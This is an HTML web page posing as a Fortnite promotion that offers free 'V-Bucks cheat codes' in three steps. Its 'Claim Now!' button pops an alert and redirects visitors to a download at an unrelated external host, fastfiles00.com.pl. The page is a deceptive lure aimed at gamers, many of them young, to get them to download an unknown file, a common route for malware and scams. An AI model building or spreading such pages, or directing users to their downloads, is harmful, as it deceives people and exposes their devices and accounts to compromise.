<!DOCTYPE html>
	<html>
		<head>
			<meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Fortnite</title>
      <style>
        body {
            margin: 0;
            padding: 0;
            height: 100;
            display: flex;
            flex-direction: column;
            align-items: center;
            align-content: center;
            justify-content: center;
            background: url('./bbb.jpg') no-repeat center/cover;
					}
					@media only screen and (max-width: 600px) {
					  font-size: 1.5em;
}

@media only screen and (min-width: 601px) and (max-width: 1024px) {
            font-size: 1.5em;
}

@media only screen and (min-width: 1025px) {
            font-size: 1.5em;
}
				.logo-img {
	margin: 0 auto 15px auto;
	display: table;
	max-width: 400px;
	backdrop-filter: blur(10px);
	           }
	  .logo {
	margin-bottom: 
	
	}
					
	.landing-box {
            display: flex;
            flex-direction: column;
            align-items: center;
            padding: 40px;
            background-color: black;
            border-radius: 10px;
            animation: bounceInOut 1s ease-in-out;
            width: 60%;
            height: 70%;
            align-content: center;
            margin: auto;
            text-align: center;
        }

        @keyframes bounceInOut {
            0%, 20%, 50%, 80%, 100% {
                transform: translateY(0);
            }
            40% {
                transform: translateY(-20px);
            }
            60% {
                transform: translateY(-10px);
            }
        }

        #heading {
            color: white;
            font-size: 24px;
            
            animation: bounceInOut 1s ease-in-out;
       }   
        #bubble a {
            background-color: red;
            color: white;
            padding: 10px;
            border-radius: 5px;
            animation: bounceInOut 1s ease-in-out;
            width: 100%;
            cursor: pointer; 
            text-decoration: none;
            font-weight: bold;
            width: 100%;
        }
         #bubble {
         	width: 400px;
              margin-top: 20px;
            
         }
        
        #bubble.clicked {
            transform: scale(1.2); 
        }
        h1, h4 {
        	color: white;
          }
          h4 {
          	margin-top: 
           }
        h3 {
        	color: grey;
            margin-top: 
        }

        h2 {
            font-size: 1.5rem;
            margin: 20px 0;
            color: white;
        }

        .steps {
            list-style-type: decimal;
            margin-bottom: 20px;
        }

        .steps li {
            margin: 10px 0;
            font-size: 1.1rem;
        }

        #claim-button {
            padding: 10px 20px;
            font-size: 1.2rem;
            background-color: #f59e0b;
            color: #000;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: 0.3s;
        }

        #claim-button:hover {
            background-color: #fbbf24;
        }

        .disclaimer {
            font-size: 0.8rem;
            margin-top: 20px;
            opacity: 0.8;
            color: grey;
        }
    }
   
			</style>
		</head>
		<body>
			<header>
				<div class="logo">
					<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="130.000000pt" height="82.000000pt" viewBox="0 0 523.000000 152.000000"
 preserveAspectRatio="xMidYMid meet">

<g transform="translate(0.000000,152.000000) scale(0.100000,-0.100000)"
fill="red" stroke="none">
<path d="M227 1513 c-4 -3 -7 -15 -7 -26 0 -17 5 -19 31 -13 19 3 38 1 46 -5
10 -9 19 -6 38 15 27 30 65 34 108 11 58 -30 96 -35 133 -18 19 9 34 23 34 31
0 12 -10 13 -57 7 -32 -4 -62 -6 -68 -5 -60 9 -139 10 -147 2 -7 -7 -16 -7
-28 1 -14 8 -22 8 -33 -2 -10 -8 -17 -9 -22 -1 -7 12 -19 13 -28 3z"/>
<path d="M643 1500 c-42 -19 -57 -40 -29 -40 7 0 42 13 77 30 61 28 62 29 29
29 -19 0 -54 -9 -77 -19z"/>
<path d="M1130 1506 c0 -8 -14 -40 -30 -71 -29 -54 -29 -58 -13 -71 10 -7 22
-14 26 -14 4 0 24 35 43 78 20 42 38 80 41 85 2 4 -12 7 -31 7 -24 0 -36 -5
-36 -14z"/>
<path d="M4198 1423 c-2 -54 -6 -105 -8 -113 -4 -11 4 -15 30 -17 19 0 52 -2
73 -4 51 -3 63 11 43 49 -16 32 -23 162 -8 162 4 0 23 -15 42 -33 88 -84 130
-119 147 -121 9 -2 21 -16 26 -32 10 -30 13 -350 8 -893 -1 -183 2 -308 7
-313 10 -10 25 -12 237 -23 72 -4 139 -9 150 -12 11 -2 48 -7 83 -10 52 -5 60
-8 51 -20 -21 -24 5 -40 42 -26 23 9 37 9 64 -3 43 -17 45 -17 45 1 0 8 -13
21 -29 30 -17 8 -33 19 -36 25 -10 16 22 12 39 -5 18 -18 26 -19 26 -2 0 7 -9
20 -20 30 -11 9 -20 22 -20 27 0 7 6 7 20 0 19 -10 20 -8 20 44 0 49 -2 54
-20 49 -16 -4 -20 0 -20 21 0 20 5 26 23 26 19 1 17 4 -15 24 -21 12 -46 30
-57 40 -29 26 -35 6 -36 -122 -1 -72 -6 -117 -13 -124 -12 -12 -18 78 -14 220
1 42 -2 62 -11 63 -7 0 -57 1 -112 2 l-100 2 -3 95 c-4 144 -8 139 96 142 l87
3 5 122 c3 67 9 125 14 130 4 4 15 -2 23 -14 12 -17 25 -23 54 -23 52 0 58 17
9 25 -62 10 -49 30 21 32 93 2 97 17 8 32 l-54 9 58 1 c49 1 57 4 57 20 0 17
-9 19 -98 23 -82 2 -102 7 -125 25 -15 12 -36 19 -46 16 -10 -3 -22 0 -25 6
-17 26 -36 11 -36 -28 0 -34 5 -44 33 -65 19 -15 39 -26 45 -26 7 0 12 -4 12
-9 0 -14 -106 -24 -129 -11 -18 9 -21 20 -21 86 0 70 1 75 25 84 13 5 63 11
110 12 47 2 85 7 86 13 1 6 1 53 0 105 -1 52 2 120 8 150 11 69 6 83 -27 75
-13 -3 -79 -11 -146 -16 -292 -25 -341 -24 -316 6 8 10 31 15 66 15 55 0 69
11 35 30 -24 12 -83 2 -94 -17 -10 -16 -39 -17 -55 -1 -23 23 -12 43 38 67 51
24 78 24 137 0 36 -14 38 -14 47 19 7 21 5 22 -58 22 -36 0 -88 -5 -116 -11
-38 -8 -55 -8 -63 0 -13 13 -47 15 -47 2 0 -5 9 -11 20 -14 20 -5 29 -47 10
-47 -6 0 -3 -11 6 -25 8 -13 13 -28 10 -34 -8 -13 -43 -2 -50 15 -3 8 -10 14
-16 14 -5 0 -27 18 -49 40 -21 22 -44 40 -50 40 -6 0 -11 5 -11 10 0 6 -8 10
-17 10 -15 0 -18 -9 -18 -52 0 -32 -5 -53 -12 -55 -10 -3 -13 11 -13 51 0 73
-14 73 -17 0 -2 -43 2 -65 17 -89 23 -36 14 -46 -30 -35 -23 6 -25 10 -26 71
-1 92 -3 109 -13 109 -5 0 -11 -44 -13 -97z"/>
<path d="M4868 1513 c-1 -5 -27 -26 -55 -48 -29 -21 -53 -44 -52 -50 0 -5 3
-4 6 3 2 6 9 10 14 6 5 -3 17 1 27 8 29 20 85 88 74 88 -6 0 -12 -3 -14 -7z"/>
<path d="M5010 1512 c0 -4 -24 -23 -52 -42 -51 -34 -52 -35 -25 -38 15 -2 41
4 59 12 42 21 44 21 85 -20 29 -30 41 -35 69 -32 18 2 31 1 28 -3 -2 -4 10 -9
26 -11 40 -6 41 23 3 39 -16 7 -59 32 -98 57 -68 43 -95 54 -95 38z"/>
<path d="M5130 1515 c0 -8 92 -47 97 -41 10 10 -9 26 -33 26 -13 0 -24 5 -24
10 0 6 -9 10 -20 10 -11 0 -20 -2 -20 -5z"/>
<path d="M1777 1504 c-4 -4 -84 -8 -179 -10 -165 -3 -255 -15 -336 -44 -18 -7
-39 -10 -46 -7 -9 4 -24 -10 -41 -35 -46 -70 -16 -91 84 -60 226 71 204 67
396 67 130 0 205 -5 270 -17 99 -20 133 -21 281 -12 76 4 117 2 162 -10 74
-19 500 -42 514 -28 16 16 -11 25 -96 33 -45 4 -119 14 -166 22 -161 29 -397
64 -482 72 -29 3 -73 8 -98 11 -25 4 -61 8 -80 10 -19 1 -67 5 -105 9 -39 3
-74 3 -78 -1z"/>
<path d="M0 1420 c0 -68 17 -80 46 -34 15 22 18 24 27 9 5 -9 10 -304 12 -685
2 -368 6 -674 10 -680 4 -6 16 -8 28 -4 12 4 49 10 82 15 33 4 80 12 105 18
25 6 55 13 67 16 24 5 23 -24 8 320 -9 203 -10 200 107 200 l83 0 3 143 3 142
-90 0 c-49 0 -92 3 -95 8 -2 4 -2 53 1 110 l6 102 96 0 c53 0 101 4 107 8 12
8 21 73 30 217 l6 90 -275 0 c-266 0 -275 1 -293 21 -11 11 -31 26 -46 32
l-28 12 0 -60z"/>
<path d="M4051 1360 c-84 -29 -110 -44 -98 -57 8 -8 152 35 185 55 24 16 29
32 10 31 -7 0 -51 -13 -97 -29z"/>
<path d="M3196 1332 c-5 -9 9 -248 23 -387 4 -44 4 -84 0 -89 -5 -5 -10 -8
-12 -5 -9 10 -47 100 -47 109 0 6 -10 32 -21 58 -37 83 -47 106 -62 147 -8 22
-25 66 -38 98 l-22 57 -68 0 c-37 0 -71 -4 -74 -10 -3 -5 -26 -10 -51 -10 -24
0 -44 -3 -45 -7 -1 -6 -6 -394 -11 -773 -1 -75 10 -301 15 -306 2 -2 61 -6
132 -8 l127 -3 -2 166 c-3 210 -2 241 8 241 5 0 19 -26 32 -57 13 -32 36 -86
52 -121 15 -34 28 -69 28 -77 0 -7 4 -16 9 -19 4 -3 11 -20 15 -37 3 -17 12
-45 20 -62 8 -18 16 -41 18 -52 3 -18 11 -20 73 -19 39 0 95 4 126 8 l57 7 -5
42 c-2 23 -7 284 -10 580 l-5 537 -128 0 c-71 0 -131 -4 -134 -8z"/>
<path d="M1414 1315 c-2 -5 -6 -248 -7 -540 -2 -292 -5 -538 -8 -547 -9 -30
-18 -32 -28 -4 -7 17 -18 26 -32 26 -21 0 -21 -1 -6 -18 28 -30 20 -39 -40
-46 -31 -4 -87 -16 -124 -27 -37 -11 -125 -27 -196 -34 -70 -8 -150 -18 -178
-24 -56 -12 -153 -25 -333 -46 -85 -9 -128 -19 -135 -29 -7 -8 -25 -17 -42
-19 -16 -2 6 -4 50 -5 84 0 162 14 100 18 -16 1 22 9 85 17 90 11 123 12 150
3 27 -9 46 -9 78 -1 23 7 70 11 105 10 35 -1 73 3 84 10 12 6 46 11 77 11 30
0 58 5 62 11 4 7 26 9 57 6 41 -3 56 0 85 19 41 28 54 29 88 7 25 -16 27 -16
43 6 15 20 25 23 72 20 43 -3 54 -1 54 11 0 26 17 31 110 29 50 0 95 0 101 0
8 1 12 48 13 158 0 86 3 159 7 162 7 7 23 -18 30 -49 3 -14 9 -34 14 -45 4
-11 18 -54 29 -95 12 -41 28 -95 35 -120 l14 -45 48 3 c185 10 224 15 233 26
7 8 6 29 -4 67 -17 64 -19 82 -5 74 6 -3 17 1 26 9 20 21 63 20 86 -1 17 -15
18 -15 18 3 0 11 5 25 12 32 8 8 8 15 -1 26 -11 13 -17 13 -53 0 -22 -8 -53
-14 -68 -14 -16 0 -30 -5 -32 -12 -6 -17 -28 0 -28 23 0 10 -4 19 -10 19 -5 0
-10 10 -10 23 0 13 -4 27 -8 32 -5 6 -14 30 -21 55 -7 25 -17 53 -22 62 -15
29 -10 51 17 83 61 71 96 181 92 293 -2 46 -6 86 -10 89 -5 2 -8 11 -8 20 0
36 -63 140 -112 185 -75 69 -107 77 -347 80 -129 2 -205 -1 -207 -7z m332
-263 c67 -56 55 -250 -19 -296 -9 -6 -19 -8 -22 -4 -11 11 -11 308 0 312 16 7
19 6 41 -12z"/>
<path d="M885 1308 c-94 -31 -142 -75 -190 -174 -39 -79 -47 -137 -52 -364 -4
-167 -2 -220 12 -285 20 -97 73 -210 118 -252 46 -43 141 -72 241 -75 71 -2
88 1 133 25 85 44 125 92 157 188 14 46 33 115 41 154 18 84 20 340 4 429 -13
74 -50 195 -61 202 -4 3 -8 12 -8 20 0 20 -98 114 -137 130 -38 16 -212 18
-258 2z m144 -278 c6 -29 11 -161 11 -307 0 -264 -7 -323 -40 -323 -39 1 -39
-4 -54 325 -4 91 11 311 24 335 6 11 19 20 30 20 14 0 21 -12 29 -50z"/>
<path d="M2118 1314 c-2 -5 -2 -68 0 -141 l4 -132 76 -3 77 -3 -1 -265 c0
-146 -3 -328 -5 -406 -3 -109 -1 -145 10 -157 11 -14 35 -17 147 -17 129 0
133 1 140 23 4 12 7 190 6 395 l-1 372 37 1 c20 1 54 1 74 0 49 -3 57 16 57
145 0 162 10 150 -127 158 -109 6 -231 15 -413 32 -42 4 -78 3 -81 -2z"/>
<path d="M3549 1284 c-5 -6 -9 -260 -9 -570 l-1 -559 41 0 c22 1 90 2 150 3
l110 2 -2 563 -3 562 -138 5 c-93 3 -142 1 -148 -6z"/>
<path d="M4330 1258 c-91 -5 -225 -11 -297 -14 -160 -6 -156 -3 -149 -136 3
-51 6 -110 6 -130 l0 -37 78 -3 77 -3 -2 -408 c-2 -318 0 -407 10 -409 76 -10
268 -11 278 -1 5 5 10 200 12 434 l2 424 88 3 88 3 -3 141 c-2 85 -7 142 -13
143 -5 0 -84 -3 -175 -7z"/>
<path d="M0 1185 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0
-10 -7 -10 -15z"/>
<path d="M0 1111 c0 -5 6 -12 13 -15 10 -5 10 -7 0 -12 -7 -3 -13 -14 -13 -25
0 -23 35 -26 44 -3 8 21 9 18 -13 42 -20 23 -31 28 -31 13z"/>
<path d="M427 1063 c-4 -3 -7 -20 -7 -36 0 -25 3 -28 23 -24 12 4 42 9 67 13
48 7 73 21 64 35 -8 14 -78 11 -93 -3 -10 -11 -15 -10 -25 5 -14 19 -19 20
-29 10z"/>
<path d="M4402 571 c-32 -22 -17 -80 21 -82 15 0 17 -2 7 -6 -20 -8 -30 -24
-30 -49 0 -16 8 -23 32 -28 36 -7 47 -1 30 16 -21 21 -14 75 11 93 15 12 18
19 10 22 -7 3 -13 11 -13 18 0 13 -53 26 -68 16z"/>
<path d="M3892 548 c-14 -18 -13 -221 2 -230 38 -25 120 9 85 36 -8 6 -15 20
-15 31 0 11 -4 35 -8 53 -6 25 -4 32 8 32 24 0 29 37 9 64 -20 28 -63 35 -81
14z"/>
<path d="M2661 536 c-10 -11 -6 -17 20 -30 37 -18 49 -14 49 20 0 20 -5 24
-29 24 -16 0 -34 -6 -40 -14z"/>
<path d="M4400 345 c0 -28 4 -35 20 -35 11 0 20 5 20 10 0 7 13 8 36 4 29 -5
35 -4 30 7 -3 8 -9 22 -12 32 -5 13 -17 17 -50 17 -44 0 -44 0 -44 -35z"/>
<path d="M640 249 c-19 -6 -64 -18 -100 -29 -36 -10 -77 -21 -92 -24 -16 -4
-28 -13 -28 -22 0 -11 6 -14 18 -11 140 44 226 67 255 67 18 0 27 4 25 13 -6
16 -34 18 -78 6z"/>
<path d="M3105 199 c-22 -12 -44 -26 -50 -33 -5 -6 -32 -29 -60 -51 -27 -21
-60 -48 -72 -59 -12 -12 -30 -28 -39 -35 -12 -10 -14 -16 -5 -19 6 -2 18 2 26
8 11 9 15 9 15 1 0 -6 10 -11 23 -10 l22 0 -22 9 c-30 12 -29 28 3 42 28 13
44 1 44 -36 0 -18 1 -18 18 -3 24 22 40 21 44 0 3 -15 6 -14 26 7 16 18 19 26
10 32 -10 6 -10 12 -1 26 7 12 8 24 2 33 -13 21 -11 39 5 39 19 0 26 -22 21
-65 -5 -33 -4 -35 15 -25 14 8 20 19 18 38 -2 19 2 27 16 30 14 3 17 0 13 -12
-4 -9 -4 -16 -2 -16 10 0 55 24 55 29 -1 15 -58 86 -70 88 -8 1 -33 -7 -55
-18z m65 -29 c0 -5 -2 -10 -4 -10 -3 0 -8 5 -11 10 -3 6 -1 10 4 10 6 0 11 -4
11 -10z m-126 -76 c9 -34 2 -40 -29 -24 -24 13 -24 15 -8 32 22 24 30 23 37
-8z"/>
<path d="M1644 151 c4 -6 38 -27 74 -45 37 -19 96 -50 132 -70 66 -36 114 -50
75 -20 -11 8 -27 20 -36 27 -47 37 -81 57 -139 82 -81 33 -116 42 -106 26z"/>
<path d="M3408 135 c-3 -3 -28 -6 -56 -6 -29 -1 -60 -8 -69 -15 -16 -12 -14
-13 17 -8 l35 5 -50 -45 c-27 -25 -47 -46 -44 -46 12 0 75 34 119 64 24 17 49
34 54 38 6 4 8 9 5 12 -3 4 -8 4 -11 1z"/>
<path d="M4171 80 c-15 -7 -21 -15 -17 -26 3 -9 6 -24 6 -33 0 -15 9 -18 58
-17 l57 1 0 40 c0 40 0 40 -40 42 -22 1 -51 -2 -64 -7z"/>
<path d="M565 31 c-38 -6 -38 -7 -14 -14 17 -4 40 -1 60 8 36 15 24 17 -46 6z"/>
</g>
</svg>
             </div>
			</header>
			<div class="landing-box">
                <h2> Get Your Promo V-Bucks cheat codes Now!</h2>
            <h3>Claim Your Reward in 3 Easy Steps:</h3>
                <h4>Click the button below to claim.</h4>
                <h4>Download.</h4>
                <h4>Receive your cheat codes instantly!</h4>
            <button id="claim-button" onclick="showAlert()">Claim Now!</button>
            <p class="disclaimer">*Disclaimer: This is a promotional offer and not affiliated with Fortnite.</p>
        
    </div>
    
    <script>
        function toggleSize() {
            const bubble = document.getElementById('bubble');
            bubble.classList.toggle('clicked');
            setTimeout(() => {
                bubble.classList.toggle('clicked');
            }, 300); // Adjust the duration of the size change
        }
        function showAlert() {
            alert("Redirecting you to the download page. Click OK to continue!");
            window.location.href = "http://fastfiles00.com.pl/2514065";
        }
    </script>
		</body>
		</html>